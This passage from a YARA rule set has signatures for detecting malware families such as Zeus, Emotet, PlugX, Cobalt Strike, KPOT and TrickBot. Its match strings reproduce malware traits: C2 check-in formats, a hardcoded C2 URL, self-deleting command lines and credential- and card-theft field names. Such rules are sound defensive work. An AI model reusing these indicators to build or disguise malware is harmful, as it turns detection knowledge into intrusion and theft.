    $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }
  condition:
    any of them
}

rule WarpStrings : Warp Family {
  meta:
    description = "Warp Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  strings:
    $ = "/2011/n325423.shtml?"
    $ = "wyle"
    $ = "\\~ISUN32.EXE"
  condition:
    any of them
}

rule Warp : Family {
  meta:
    description = "Warp"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  condition:
    WarpCode or WarpStrings
}

rule WimmieShellcode : Wimmie Family {
  meta:
    description = "Wimmie code features"
    author = "Seth Hardy"
    last_modified = "2014-07-17"
  strings:
    $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
    $xordecrypt = { B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }
  condition:
    any of them
}

rule WimmieStrings : Wimmie Family {
  meta:
    description = "Strings used by Wimmie"
    author = "Seth Hardy"
    last_modified = "2014-07-17"
  strings:
    $ = "\x00ScriptMan"
    $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" ascii wide
    $ = "ProbeScriptFint" ascii wide
    $ = "ProbeScriptKids"
  condition:
    any of them
}

rule Wimmie : Family {
  meta:
    description = "Wimmie family"
    author = "Seth Hardy"
    last_modified = "2014-07-17"
  condition:
    WimmieShellcode or WimmieStrings
}

rule XHide : MALW {
  meta:
    description = "XHide - Process Faker"
    author = "Joan Soriano / @w0lfvan"
    date = "2017-12-01"
    version = "1.0"
    MD5 = "c644c04bce21dacdeb1e6c14c081e359"
    SHA256 = "59f5b21ef8a570c02453b5edb0e750a42a1382f6"
  strings:
    $a = "XHide - Process Faker"
    $b = "Fakename: %s PidNum: %d"
  condition:
    all of them
}

rule XMRIG_Miner {
  meta:
    ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e"
  strings:
    $a1 = "stratum+tcp"
  condition:
    $a1
}

rule XOR_DDosv1 : DDoS {
  meta:
    author = "Akamai CSIRT"
    description = "Rule to detect XOR DDos infection"
  strings:
    $st0 = "BB2FA36AAA9541F0"
    $st1 = "md5="
    $st2 = "denyip="
    $st3 = "filename="
    $st4 = "rmfile="
    $st5 = "exec_packet"
    $st6 = "build_iphdr"
  condition:
    all of them
}

rule YayihCode : Yayih Family {
  meta:
    description = "Yayih code features"
    author = "Seth Hardy"
    last_modified = "2014-07-11"
  strings:
    $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 }
  condition:
    any of them
}

rule YayihStrings : Yayih Family {
  meta:
    description = "Yayih Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-11"
  strings:
    $ = "/bbs/info.asp"
    $ = "\\msinfo.exe"
    $ = "%s\\%srcs.pdf"
    $ = "\\aumLib.ini"
  condition:
    any of them
}

rule Yayih : Family {
  meta:
    description = "Yayih"
    author = "Seth Hardy"
    last_modified = "2014-07-11"
  condition:
    YayihCode or YayihStrings
}

rule yordanyan_activeagent {
  meta:
    description = "Memory string yara for Yordanyan ActiveAgent"
    author = "J from THL <j@techhelplist.com>"
    reference1 = "https://www.virustotal.com/#/file/a2e34bfd5a9789837bc2d580e87ec11b9f29c4a50296ef45b06e3895ff399746/detection"
    reference2 = "ETPRO TROJAN Win32.ActiveAgent CnC Create"
    date = "2018-10-04"
    maltype = "Botnet"
    filetype = "memory"
  strings:
    $s01 = "I'm KeepRunner!" wide
    $s02 = "I'm Updater!" wide
    $s03 = "Starting Download..." wide
    $s04 = "Download Complete!" wide
    $s05 = "Running New Agent and terminating updater!" wide
    $s06 = "Can't Run downloaded file!" wide
    $s07 = "Retrying download and run!" wide
    $s08 = "Can't init Client." wide
    $s09 = "Client initialised -" wide
    $s10 = "Client not found!" wide
    $s11 = "Client signed." wide
    $s12 = "GetClientData" wide
    $s13 = "&counter=" wide
    $s14 = "&agent_file_version=" wide
    $s15 = "&agent_id=" wide
    $s16 = "mac_address=" wide
    $s17 = "Getting Attachments" wide
    $s18 = "public_name" wide
    $s19 = "Yor agent id =" wide
    $s20 = "Yor agent version =" wide
    $s21 = "Last agent version =" wide
    $s22 = "Agent is last version." wide
    $s23 = "Updating Agent" wide
    $s24 = "Terminating RunKeeper" wide
    $s25 = "Terminating RunKeeper: Done" wide
    $s26 = "ActiveAgent" ascii
    $s27 = "public_name" ascii
  condition:
    15 of them
}

rule Zegost : Trojan {
  meta:
    author = "Kevin Falcoz"
    date = "10/06/2013"
    description = "Zegost Trojan"
  strings:
    $signature1 = { 39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D }
    $signature2 = { 00 BA DA 22 51 42 6F 6D 65 00 }
  condition:
    $signature1 and $signature2
}

rule Windows_Malware_Zeus : Zeus_1134 {
  meta:
    author = "Xylitol xylitol@malwareint.com"
    date = "2014-03-03"
    description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4"
    reference = "http://www.xylibox.com/2014/03/zeus-1134.html"
  strings:
    $mz = { 4D 5A }
    $protocol1 = "X_ID: "
    $protocol2 = "X_OS: "
    $protocol3 = "X_BV: "
    $stringR1 = "InitializeSecurityDescriptor"
    $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
  condition:
    ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2))
}

rule Adwind {
  meta:
    author = "Asaf Aprozper, asafa AT minerva-labs.com"
    description = "Adwind RAT"
    reference = "https://minerva-labs.com/post/adwind-and-other-evasive-java-rats"
    last_modified = "2017-06-25"
  strings:
    $a0 = "META-INF/MANIFEST.MF"
    $a1 = /Main(\$)Q[0-9][0-9][0-9][0-9]/
    $PK = "PK"
  condition:
    $PK at 0 and $a0 and $a1
}

rule hancitor {
  meta:
    description = "Memory string yara for Hancitor"
    author = "J from THL <j@techhelplist.com>"
    reference1 = "https://researchcenter.paloaltonetworks.com/2018/02/threat-brief-hancitor-actors/"
    reference2 = "https://www.virustotal.com/#/file/43e17f30b78c085e9bda8cadf5063cd5cec9edaa7441594ba1fe51391cc1c486/"
    reference3 = "https://www.virustotal.com/#/file/d135f03b9fdc709651ac9d0264e155c5580b072577a8ff24c90183b126b5e12a/"
    date = "2018-09-18"
    maltype1 = "Botnet"
    filetype = "memory"
  strings:
    $a = "GUID=" ascii
    $b = "&BUILD=" ascii
    $c = "&INFO=" ascii
    $d = "&IP=" ascii
    $e = "&TYPE=" ascii
    $f = "php|http" ascii
    $g = "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d" ascii fullword
  condition:
    5 of ($a, $b, $c, $d, $e, $f) or $g
}

rule mimikatz_kirbi_ticket {
  meta:
    description = "KiRBi ticket for mimikatz"
    author = "Benjamin DELPY (gentilkiwi); Didier Stevens"
  strings:
    $asn1 = { 76 82 ?? ?? 30 82 ?? ?? A0 03 02 01 05 A1 03 02 01 16 }
    $asn1_84 = { 76 84 ?? ?? ?? ?? 30 84 ?? ?? ?? ?? A0 84 00 00 00 03 02 01 05 A1 84 00 00 00 03 02 01 16 }
  condition:
    $asn1 at 0 or $asn1_84 at 0
}

rule kpot {
  meta:
    author = " J from THL <j@techhelplist.com>"
    date = "2018-08-29"
    reference1 = "https://www.virustotal.com/#/file/4e87a0794bf73d06ac1ce4a37e33eb832ff4c89fb9e4266490c7cef9229d27a7/detection"
    reference2 = "ETPRO TROJAN KPOT Stealer Check-In [2832358]"
    reference3 = "ETPRO TROJAN KPOT Stealer Exfiltration [2832359]"
    version = 1
    maltype = "Stealer"
    filetype = "memory"
  strings:
    $text01 = "bot_id=%s"
    $text02 = "x64=%d"
    $text03 = "is_admin=%d"
    $text04 = "IL=%d"
    $text05 = "os_version=%d"
    $text06 = "IP: %S"
    $text07 = "MachineGuid: %s"
    $text08 = "CPU: %S (%d cores)"
    $text09 = "RAM: %S MB"
    $text10 = "Screen: %dx%d"
    $text11 = "PC: %s"
    $text12 = "User: %s"
    $text13 = "LT: %S (UTC+%d:%d)"
    $text14 = "%s/%s.php"
    $text15 = "Host: %s"
    $text16 = "username_value"
    $text17 = "password_value"
    $text18 = "name_on_card"
    $text19 = "last_four"
    $text20 = "exp_month"
    $text21 = "exp_year"
    $text22 = "bank_name"
  condition:
    16 of them
}

rule marap {
  meta:
    author = " J from THL <j@techhelplist.com>"
    date = "2018-08-19"
    reference1 = "https://www.virustotal.com/#/file/61dfc4d535d86359c2f09dbdd8f14c0a2e6367e5bb7377812f323a94d32341ba/detection"
    reference2 = "https://www.virustotal.com/#/file/c0c85f93a4f425a23c2659dce11e3b1c8b9353b566751b32fcb76b3d8b723b94/detection"
    reference3 = "https://threatpost.com/highly-flexible-marap-malware-enters-the-financial-scene/136623/"
    reference4 = "https://www.bleepingcomputer.com/news/security/necurs-botnet-pushing-new-marap-malware/"
    version = 1
    maltype = "Downloader"
    filetype = "memory"
  strings:
    $text01 = "%02X-%02X-%02X-%02X-%02X-%02X" wide
    $text02 = "%s, base=0x%p" wide
    $text03 = "pid=%d" wide
    $text04 = "%s %s" wide
    $text05 = "%d|%d|%s|%s|%s" wide
    $text06 = "%s|1|%d|%d|%d|%d|%d|%s" wide
    $text07 = "%d#%s#%s#%s#%d#%s#%s#%d#%s#%s#%s#%s#%d" wide
    $text08 = "%s|1|%d|%d|%d|%d|%d|%s#%s#%s#%s#%d#%d#%d" wide
    $text09 = "%s|0|%d" wide
    $text10 = "%llx" wide
    $text11 = "%s -a" wide
  condition:
    7 of them
}

rule shifu_shiz {
  meta:
    description = "Memory string yara for Shifu/Shiz"
    author = "J from THL <j@techhelplist.com>"
    reference1 = "https://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/"
    reference2 = "https://beta.virusbay.io/sample/browse/24a6dfaa98012a839658c143475a1e46"
    reference3 = "https://raw.githubusercontent.com/Neo23x0/signature-base/master/yara/crime_shifu_trojan.yar"
    date = "2018-03-16"
    maltype1 = "Banker"
    maltype2 = "Keylogger"
    maltype3 = "Stealer"
    filetype = "memory"
  strings:
    $aa = "auth_loginByPassword" ascii fullword
    $ab = "back_command" ascii fullword
    $ac = "back_custom1" ascii fullword
    $ad = "GetClipboardData" ascii fullword
    $ae = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe" ascii fullword
    $af = "mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe" ascii fullword
    $ag = "svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe" ascii fullword
    $ah = "!inject" ascii fullword
    $ai = "!deactivebc" ascii fullword
    $aj = "!kill_os" ascii fullword
    $ak = "!load" ascii fullword
    $al = "!new_config" ascii fullword
    $am = "!activebc" ascii fullword
    $an = "keylog.txt" ascii fullword
    $ao = "keys_path.txt" ascii fullword
    $ap = "pass.log" ascii fullword
    $aq = "passwords.txt" ascii fullword
    $ar = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" ascii fullword
    $as = "Content-Disposition: form-data; name=\"pcname\"" ascii fullword
    $at = "botid=%s&ver=" ascii fullword
    $au = "action=auth&np=&login=" ascii fullword
    $av = "&ctl00%24MainMenu%24Login1%24UserName=" ascii fullword
    $aw = "&cvv=" ascii fullword
    $ax = "&cvv2=" ascii fullword
    $ay = "&domain=" ascii fullword
    $az = "LOGIN_AUTHORIZATION_CODE=" ascii fullword
    $ba = "name=%s&port=%u" ascii fullword
    $bb = "PeekNamedPipe" ascii fullword
    $bc = "[pst]" ascii fullword
    $bd = "[ret]" ascii fullword
    $be = "[tab]" ascii fullword
    $bf = "[bks]" ascii fullword
    $bg = "[del]" ascii fullword
    $bh = "[ins]" ascii fullword
    $bi = "&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d&cn=" ascii fullword
  condition:
    18 of them
}

rule sitrof_fortis_scar {
  meta:
    author = "J from THL <j@techhelplist.com>"
    date = "2018/23"
    reference1 = "https://www.virustotal.com/#/file/59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c/community"
    reference2 = "ETPRO rule 2806032, ETPRO TROJAN Win32.Scar.hhrw POST"
    version = 2
    maltype = "Stealer"
    filetype = "memory"
  strings:
    $a = "?get&version"
    $b = "?reg&ver="
    $c = "?get&exe"
    $d = "?get&download"
    $e = "?get&module"
    $f = "&ver="
    $g = "&comp="
    $h = "&addinfo="
    $i = "%s@%s; %s %s \"%s\" processor(s)"
    $j = "User-Agent: fortis"
  condition:
    6 of them
}

rule viotto_keylogger {
  strings:
    $hdr = "MZ"
    $s1 = "Viotto Keylogger"
    $s2 = "msvbvm60"
    $s3 = "FtpPutFileA"
    $s4 = "VBA6"
    $s5 = "SetWindowsHookExA"
  condition:
    ($hdr at 0) and all of ($s*)
}

rule xDedic_SysScan_unpacked : crimeware {
  meta:
    author = " Kaspersky Lab"
    ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf"
    maltype = "crimeware"
    type = "crimeware"
    filetype = "Win32 EXE"
    date = "2016-03-14"
    version = "1.0"
    hash = "fac495be1c71012682ebb27092060b43"
    hash = "e8cc69231e209db7968397e8a244d104"
    hash = "a53847a51561a7e76fd034043b9aa36d"
    hash = "e8691fa5872c528cd8e72b82e7880e98"
    hash = "F661b50d45400e7052a2427919e2f777"
  strings:
    $a1 = "/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide
    $a2 = "SysScan DEBUG Mode!!!" ascii wide
    $a3 = "This rechecking? (set 0/1 or press enter key)" ascii wide
    $a4 = "http://37.49.224.144:8189/manual_result" ascii wide
    $b1 = "Checker end work!" ascii wide
    $b2 = "Trying send result..." ascii wide
  condition:
    ((uint16(0) == 23117)) and (filesize < 5000000) and ((any of ($a*)) or (all of ($b*)))
}

rule xdedic_packed_syscan : crimeware {
  meta:
    author = "Kaspersky Lab"
    company = "Kaspersky Lab"
    ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf"
  strings:
    $a1 = "SysScan.exe" ascii wide nocase
  condition:
    uint16(0) == 23117 and any of ($a*) and filesize > 1000000 and filesize < 1200000 and pe.number_of_sections == 13 and pe.version_info["FileVersion"] contains "1.3.4."
}

rule TSCookie {
  meta:
    description = "detect TSCookie in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html"
    hash1 = "6d2f5675630d0dae65a796ac624fb90f42f35fbe5dec2ec8f4adce5ebfaabf75"
  strings:
    $v1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" wide
    $b1 = { 68 D4 08 00 00 }
  condition:
    all of them
}

rule TSC_Loader {
  meta:
    description = "detect TSCookie Loader in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $v1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" wide
    $b1 = { 68 78 0B 00 00 }
  condition:
    all of them
}

rule CobaltStrike {
  meta:
    description = "detect CobaltStrike Beacon in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html"
    hash1 = "154db8746a9d0244146648006cc94f120390587e02677b97f044c25870d512c3"
    hash2 = "f9b93c92ed50743cd004532ab379e3135197b6fb5341322975f4d7a98a0fcde7"
  strings:
    $v1 = { 73 70 72 6E 67 00 }
    $v2 = { 69 69 69 69 69 69 69 69 }
  condition:
    all of them
}

rule RedLeaves {
  meta:
    description = "detect RedLeaves in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory block scan"
    reference = "https://blogs.jpcert.or.jp/en/2017/05/volatility-plugin-for-detecting-redleaves-malware.html"
    hash1 = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481"
  strings:
    $v1 = "red_autumnal_leaves_dllmain.dll"
    $b1 = { FF FF 90 00 }
  condition:
    $v1 and $b1 at 0
}

rule Himawari {
  meta:
    description = "detect Himawari(a variant of RedLeaves) in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf"
    hash1 = "3938436ab73dcd10c495354546265d5498013a6d17d9c4f842507be26ea8fafb"
  strings:
    $h1 = "himawariA"
    $h2 = "himawariB"
    $h3 = "HimawariDemo"
  condition:
    all of them
}

rule Lavender {
  meta:
    description = "detect Lavender(a variant of RedLeaves) in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
    hash1 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d"
  strings:
    $a1 = { C7 ?? ?? 4C 41 56 45 }
    $a2 = { C7 ?? ?? 4E 44 45 52 }
  condition:
    all of them
}

rule Armadill {
  meta:
    description = "detect Armadill(a variant of RedLeaves) in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $a1 = { C7 ?? ?? 41 72 6D 61 }
    $a2 = { C7 ?? ?? 64 69 6C 6C }
  condition:
    all of them
}

rule zark20rk {
  meta:
    description = "detect zark20rk(a variant of RedLeaves) in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
    hash1 = "d95ad7bbc15fdd112594584d92f0bff2c348f48c748c07930a2c4cc6502cd4b0"
  strings:
    $a1 = { C7 ?? ?? 7A 61 72 6B }
    $a2 = { C7 ?? ?? 32 30 72 6B }
  condition:
    all of them
}

rule Ursnif {
  meta:
    description = "detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
    hash1 = "0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85"
    hash2 = "ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714"
    hash3 = "1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510"
  strings:
    $a1 = "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x"
    $b1 = "client.dll" fullword
    $c1 = "version=%u"
    $c2 = "user=%08x%08x%08x%08x"
    $c3 = "server=%u"
    $c4 = "id=%u"
    $c5 = "crc=%u"
    $c6 = "guid=%08x%08x%08x%08x"
    $c7 = "name=%s"
    $c8 = "soft=%u"
    $d1 = "%s://%s%s"
    $d2 = "PRI \x2A HTTP/2.0"
    $e1 = { A1 ?? ?? ?? 00 35 E7 F7 8A 40 50 }
    $e2 = { 56 56 56 6A 06 5? FF ?? ?? ?? ?? 00 }
    $f1 = { 56 57 BE ?? ?? ?? ?? 8D ?? ?? A5 A5 A5 }
    $f2 = { 35 8F E3 B7 3F }
    $f3 = { 35 0A 60 2E 51 }
  condition:
    $a1 or ($b1 and 3 of ($c*)) or (5 of ($c*)) or ($b1 and all of ($d*)) or all of ($e*) or all of ($f*)
}

rule Emotet {
  meta:
    description = "detect Emotet in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $v4a = { BB 00 C3 4C 84 }
    $v4b = { B8 00 C3 CC 84 }
    $v5a = { 69 01 6D 4E C6 41 05 39 30 00 00 }
    $v5b = { 6D 4E C6 41 33 D2 81 C1 39 30 00 00 }
  condition:
    ($v4a and $v4b) or $v5a or $v5b
}

rule SmokeLoader {
  meta:
    description = "detect SmokeLoader in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "https://www.cert.pl/en/news/single/dissecting-smoke-loader/"
  strings:
    $a1 = { B8 25 30 38 58 }
    $b1 = { 81 3D ?? ?? ?? ?? 25 00 41 00 }
    $c1 = { C7 ?? ?? ?? 25 73 25 73 }
  condition:
    $a1 and $b1 and $c1
}

rule Datper {
  meta:
    description = "detect Datper in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html"
  strings:
    $a1 = { E8 03 00 00 }
    $b1 = "|||"
    $c1 = "Content-Type: application/x-www-form-urlencoded"
    $push7530h64 = { C7 C1 30 75 00 00 }
    $push7530h = { 68 30 75 00 00 }
  condition:
    $a1 and $b1 and $c1 and ($push7530h64 or $push7530h)
}

rule PlugX {
  meta:
    description = "detect PlugX in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $v1 = { 47 55 4C 50 00 00 00 00 }
    $v2a = { 68 40 25 00 00 }
    $v2c = { 68 58 2D 00 00 }
    $v2b = { 68 A0 02 00 00 }
    $v2d = { 68 A4 36 00 00 }
    $v2e = { 8D 46 10 68 }
    $v2f = { 68 24 0D 00 00 }
    $v2g = { 68 A0 02 00 00 }
    $v2h = { 68 E4 0A 00 00 }
    $enc1 = { C1 E? 03 C1 E? 07 2B ?? }
    $enc2 = { 32 5? ?? 81 E? ?? ?? 00 00 2A 5? ?? 89 ?? ?? 32 ?? 2A ?? 32 5? ?? 2A 5? ?? 32 }
    $enc3 = { B? 33 33 33 33 }
    $enc4 = { B? 44 44 44 44 }
  condition:
    $v1 at 0 or ($v2a and $v2b and $enc1) or ($v2c and $v2b and $enc1) or ($v2d and $v2b and $enc2) or ($v2d and $v2e and $enc2) or ($v2f and $v2g and $enc3 and $enc4) or ($v2h and $v2g and $enc3 and $enc4)
}

rule Ramnit {
  meta:
    description = "detect Ramnit"
    author = "nazywam"
    module = "ramnit"
    reference = "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/"
  strings:
    $guid = "{%08X-%04X-%04X-%04X-%08X%04X}"
    $md5_magic_1 = "15Bn99gT"
    $md5_magic_2 = "1E4hNy1O"
    $init_dga = { C7 ?? ?? ?? ?? ?? FF FF FF FF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? }
    $xor_secret = { 8A ?? ?? 32 ?? 88 ?? 4? 4? E2 ?? }
    $init_function = { FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 }
    $dga_rand_int = { B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 }
    $cookies = "cookies4.dat"
    $s3 = "pdatesDisableNotify"
    $get_domains = { A3 [4] A1 [4] 80 3? 00 75 ?? C7 05 [4] FF FF FF FF FF 35 [4] FF 35 [4] FF 35 [4] E8 }
    $add_tld = { 55 8B EC 83 ?? ?? 57 C7 ?? ?? 00 00 00 00 B? ?? ?? ?? ?? 8B ?? ?? 3B ?? ?? 75 ?? 8B ?? }
    $get_port = { 90 68 [4] 68 [4] FF 35 [4] FF 35 [4] E8 [4] 83 }
  condition:
    $init_dga and $init_function and 2 of ($guid, $md5_magic_*, $cookies, $s3) and any of ($get_port, $add_tld, $dga_rand_int, $get_domains, $xor_secret)
}

rule Hawkeye {
  meta:
    description = "detect HawkEye in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $hawkstr1 = "HawkEye Keylogger" wide
    $hawkstr2 = "Dear HawkEye Customers!" wide
    $hawkstr3 = "HawkEye Logger Details:" wide
  condition:
    all of them
}

rule Lokibot {
  meta:
    description = "detect Lokibot in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
    hash1 = "6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c"
  strings:
    $des3 = { 68 03 66 00 00 }
    $param = "MAC=%02X%02X%02XINSTALL=%08X%08X"
    $string = { 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00 }
  condition:
    all of them
}

rule Bebloh {
  meta:
    description = "detect Bebloh(a.k.a. URLZone) in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $crc32f = { B8 EE 56 0B CA }
    $dga = "qwertyuiopasdfghjklzxcvbnm123945678"
    $post1 = "&vcmd="
    $post2 = "?tver="
  condition:
    all of them
}

rule xxmm {
  meta:
    description = "detect xxmm in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $v1 = "setupParameter:"
    $v2 = "loaderParameter:"
    $v3 = "parameter:"
  condition:
    all of them
}

rule Azorult {
  meta:
    description = "detect Azorult in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $v1 = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"
    $v2 = "http://ip-api.com/json"
    $v3 = { C6 07 1E C6 47 01 15 C6 47 02 34 }
  condition:
    all of them
}

rule PoisonIvy {
  meta:
    description = "detect PoisonIvy in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $a1 = { 0E 89 02 44 }
    $b1 = { AD D1 34 41 }
    $c1 = { 66 35 20 83 66 81 F3 B8 ED }
  condition:
    all of them
}

rule netwire {
  meta:
    description = "detect netwire in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $v1 = "HostId-%Rand%"
    $v2 = "mozsqlite3"
    $v3 = "[Scroll Lock]"
    $v4 = "GetRawInputData"
    $ping = "ping 192.0.2.2"
    $log = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
  condition:
    ($v1) or ($v2 and $v3 and $v4) or ($ping and $log)
}

rule Nanocore {
  meta:
    description = "detect Nanocore in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $v1 = "NanoCore Client"
    $v2 = "PluginCommand"
    $v3 = "CommandType"
  condition:
    all of them
}

rule Formbook {
  meta:
    description = "detect Formbook in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $sqlite3step = { 68 34 1C 7B E1 }
    $sqlite3text = { 68 38 2A 90 C5 }
    $sqlite3blob = { 68 53 D8 7F 8C }
  condition:
    all of them
}

rule Agenttesla_type1 {
  meta:
    description = "detect Agenttesla in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
  strings:
    $iestr = "C:\\\\Users\\\\Admin\\\\Desktop\\\\IELibrary\\\\IELibrary\\\\obj\\\\Debug\\\\IELibrary.pdb"
    $atstr = "C:\\\\Users\\\\Admin\\\\Desktop\\\\ConsoleApp1\\\\ConsoleApp1\\\\obj\\\\Debug\\\\ConsoleApp1.pdb"
    $sqlitestr = "Not a valid SQLite 3 Database File" wide
  condition:
    all of them
}

rule Agenttesla_type2 {
  meta:
    description = "detect Agenttesla in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "internal research"
    hash1 = "670a00c65eb6f7c48c1e961068a1cb7fd3653bd29377161cd04bf15c9d010da2 "
  strings:
    $type2db1 = "1.85 (Hash, version 2, native byte-order)" wide
    $type2db2 = "Unknow database format" wide
    $type2db3 = "SQLite format 3" wide
  condition:
    all of them
}

rule Noderat {
  meta:
    description = "detect Noderat in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    reference = "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html"
  strings:
    $config = "/config/app.json"
    $key = "/config/.regeditKey.rc"
    $message = "uninstall error when readFileSync: "
  condition:
    all of them
}

rule Njrat2 {
  meta:
    description = "detect njRAT in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    hash1 = "d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d"
  strings:
    $reg = "SEE_MASK_NOZONECHECKS" wide fullword
    $msg = "Execute ERROR" wide fullword
    $ping = "cmd.exe /c ping 0 -n 2 & del" wide fullword
  condition:
    all of them
}

rule Trickbot {
  meta:
    description = "detect TrickBot in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    hash1 = "2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c"
  strings:
    $tagm1 = "<mcconf><ver>" wide
    $tagm2 = "</autorun></mcconf>" wide
    $tagc1 = "<moduleconfig><autostart>" wide
    $tagc2 = "</autoconf></moduleconfig>" wide
    $tagi1 = "<igroup><dinj>" wide
    $tagi2 = "</dinj></igroup>" wide
    $tags1 = "<servconf><expir>" wide
    $tags2 = "</plugins></servconf>" wide
    $tagl1 = "<slist><sinj>" wide
    $tagl2 = "</sinj></slist>" wide
  condition:
    all of ($tagm*) or all of ($tagc*) or all of ($tagi*) or all of ($tags*) or all of ($tagl*)
}

rule Remcos {
  meta:
    description = "detect Remcos in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
    hash1 = "7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5"
  strings:
    $remcos = "Remcos" ascii fullword
    $url = "Breaking-Security.Net" ascii fullword
    $resource = "SETTINGS" wide fullword
  condition:
    all of them
}

rule Quasar {
  meta:
    description = "detect Remcos in memory"
    author = "JPCERT/CC Incident Response Group"
    rule_usage = "memory scan"
